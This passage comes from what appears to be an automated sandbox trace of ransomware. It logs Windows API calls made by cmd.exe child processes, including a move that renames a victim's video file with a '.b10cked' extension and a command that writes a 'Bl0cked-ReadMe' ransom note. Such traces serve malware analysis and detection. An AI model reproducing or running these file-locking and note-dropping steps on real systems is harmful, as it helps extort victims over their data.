_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.629] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.629] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.629] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.629] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.629] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.629] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f548 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.629] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f548, lpFilePart=0x18f544 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f544*="Desktop") returned 0x18 [0220.629] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.629] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f2c4 | out: lpFindFileData=0x18f2c4) returned 0x2b0028 [0220.629] FindClose (in: hFindFile=0x2b0028 | out: hFindFile=0x2b0028) returned 1 [0220.629] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f2c4 | out: lpFindFileData=0x18f2c4) returned 0x2b0028 [0220.629] FindClose (in: hFindFile=0x2b0028 | out: hFindFile=0x2b0028) returned 1 [0220.629] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f2c4 | out: lpFindFileData=0x18f2c4) returned 0x2b0028 [0220.630] FindClose (in: hFindFile=0x2b0028 | out: hFindFile=0x2b0028) returned 1 [0220.630] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.630] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.630] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.630] GetEnvironmentStringsW () returned 0x2b2b08* 
[0220.630] FreeEnvironmentStringsW (penv=0x2b2b08) returned 1 [0220.630] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.630] GetConsoleOutputCP () returned 0x1b5 [0220.631] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.631] GetUserDefaultLCID () returned 0x409 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f688, cchData=128 | out: lpLCData="0") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f688, cchData=128 | out: lpLCData="0") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f688, cchData=128 | out: lpLCData="1") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 
[0220.631] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.632] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.632] GetConsoleTitleW (in: lpConsoleTitle=0x2a08f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.633] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.633] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.633] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.633] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.633] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.633] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.633] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.634] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.634] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.634] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.634] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.636] GetConsoleTitleW (in: lpConsoleTitle=0x18f380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0222.910] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0222.910] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0222.910] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0222.910] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0222.910] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0222.910] _wcsicmp (_String1="move", _String2="CD") returned 10 [0222.910] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0222.910] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0222.911] _wcsicmp (_String1="move", _String2="REN") returned -5 [0222.911] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0222.911] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0222.911] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0222.911] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0222.911] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0222.911] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0222.911] _wcsicmp (_String1="move", _String2="MD") returned 11 [0222.911] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0222.911] _wcsicmp (_String1="move", _String2="RD") returned -5 [0222.911] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0222.911] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0222.911] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0222.911] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0222.911] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0222.911] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0222.911] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0222.911] _wcsicmp (_String1="move", _String2="VER") returned -9 [0222.911] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0222.911] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0222.911] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0222.911] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0222.911] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0222.911] _wcsicmp (_String1="move", _String2="START") returned -6 [0222.911] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0222.911] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0222.911] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0222.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.913] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.913] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f13c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f134, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18f134*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0222.913] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0222.914] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0222.914] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0222.914] _wcsicmp (_String1="BON4K7~1.AVI", _String2=".") returned 52 [0222.914] _wcsicmp (_String1="BON4K7~1.AVI", _String2="..") returned 52 [0222.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7~1.avi")) returned 0x20 [0222.915] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0222.915] SetErrorMode (uMode=0x0) returned 0x0 [0222.915] SetErrorMode (uMode=0x1) returned 0x0 [0222.915] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", nBufferLength=0x104, lpBuffer=0x18eac4, lpFilePart=0x18eaac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", lpFilePart=0x18eaac*="BON4K7~1.AVI") returned 0x2a 
[0222.915] SetErrorMode (uMode=0x0) returned 0x1 [0222.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki")) returned 0x10 [0222.915] _wcsicmp (_String1="BON4K7~1.AVI", _String2=".") returned 52 [0222.915] _wcsicmp (_String1="BON4K7~1.AVI", _String2="..") returned 52 [0222.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7~1.avi")) returned 0x20 [0222.915] SetErrorMode (uMode=0x0) returned 0x0 [0222.915] SetErrorMode (uMode=0x1) returned 0x0 [0222.915] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", nBufferLength=0x104, lpBuffer=0x18ef40, lpFilePart=0x18ecd8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", lpFilePart=0x18ecd8*="BON4K7~1.AVI") returned 0x2a [0222.915] SetErrorMode (uMode=0x0) returned 0x1 [0222.916] SetErrorMode (uMode=0x0) returned 0x0 [0222.916] SetErrorMode (uMode=0x1) returned 0x0 [0222.916] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked", nBufferLength=0x104, lpBuffer=0x18f148, lpFilePart=0x18ecd8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked", lpFilePart=0x18ecd8*="bON4k7zjy0QFC_kDVvV.avi.b10cked") returned 0x3d [0222.916] SetErrorMode (uMode=0x0) returned 0x1 [0222.916] SetLastError (dwErrCode=0x0) [0222.916] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi.b10cked")) returned 0xffffffff [0222.916] GetLastError () returned 0x2 [0222.916] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", fInfoLevelId=0x1, lpFindFileData=0x18e654, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e654) returned 0x2a0eb0 [0222.916] FindNextFileW (in: hFindFile=0x2a0eb0, 
lpFindFileData=0x18e654 | out: lpFindFileData=0x18e654) returned 0 [0222.917] GetLastError () returned 0x12 [0222.917] FindClose (in: hFindFile=0x2a0eb0 | out: hFindFile=0x2a0eb0) returned 1 [0222.918] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\BON4K7~1.AVI", fInfoLevelId=0x1, lpFindFileData=0x2b1c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1c08) returned 0x2a0eb0 [0222.918] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked", nBufferLength=0x104, lpBuffer=0x18e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked", lpFilePart=0x0) returned 0x3d [0222.918] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi", nBufferLength=0x104, lpBuffer=0x18e8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi", lpFilePart=0x0) returned 0x35 [0222.918] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi")) returned 0x20 [0222.918] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\bON4k7zjy0QFC_kDVvV.avi.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\bon4k7zjy0qfc_kdvvv.avi.b10cked"), dwFlags=0x3) returned 1 [0222.919] FindClose (in: hFindFile=0x2a0eb0 | out: hFindFile=0x2a0eb0) returned 1 [0222.919] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e8a0 | out: _Buffer=" 1") returned 9 [0222.919] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.919] GetFileType (hFile=0x7) returned 0x2 [0222.919] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0222.919] GetConsoleMode (in: hConsoleHandle=0x7, 
lpMode=0x18e82c | out: lpMode=0x18e82c) returned 1 [0222.919] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e860 | out: lpConsoleScreenBufferInfo=0x18e860) returned 1 [0222.920] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0222.920] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x18e8a0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0222.920] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e884, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x18e884*=0x1a) returned 1 [0222.920] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0222.921] _get_osfhandle (_FileHandle=1) returned 0x7 [0222.921] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0222.921] _get_osfhandle (_FileHandle=0) returned 0x3 [0222.921] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0222.921] SetConsoleInputExeNameW () returned 0x1 [0222.921] GetConsoleOutputCP () returned 0x1b5 [0222.921] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0222.921] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.921] exit (_Code=0) Process: id = "580" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d20" os_pid = "0xddc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" 
> \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32964 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32965 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32966 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32967 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 32968 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32969 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32970 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32971 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32972 start_va = 
0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 32973 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33008 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33009 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33010 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33011 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 33012 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 33013 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33014 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33015 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33016 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 33017 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33018 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33019 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33020 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33021 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33022 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 33023 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33024 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33025 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33026 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" 
filename = "" Region: id = 33027 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33028 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33029 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 33030 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 33031 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Thread: id = 784 os_tid = 0xe1c [0220.148] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f7a4 | out: lpSystemTimeAsFileTime=0x26f7a4*(dwLowDateTime=0xb8050b40, dwHighDateTime=0x1d440a9)) [0220.148] GetCurrentProcessId () returned 0xddc [0220.148] GetCurrentThreadId () returned 0xe1c [0220.148] GetTickCount () returned 0x3d73b [0220.148] QueryPerformanceCounter (in: lpPerformanceCount=0x26f79c | out: lpPerformanceCount=0x26f79c*=27693766822) returned 1 [0220.149] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.149] __set_app_type (_Type=0x1) [0220.149] __p__fmode () returned 0x76b331f4 [0220.149] __p__commode () returned 0x76b331fc [0220.149] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.149] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.150] GetCurrentThreadId () returned 0xe1c [0220.150] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe1c) returned 0x38 [0220.150] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.150] GetProcAddress (hModule=0x76910000, 
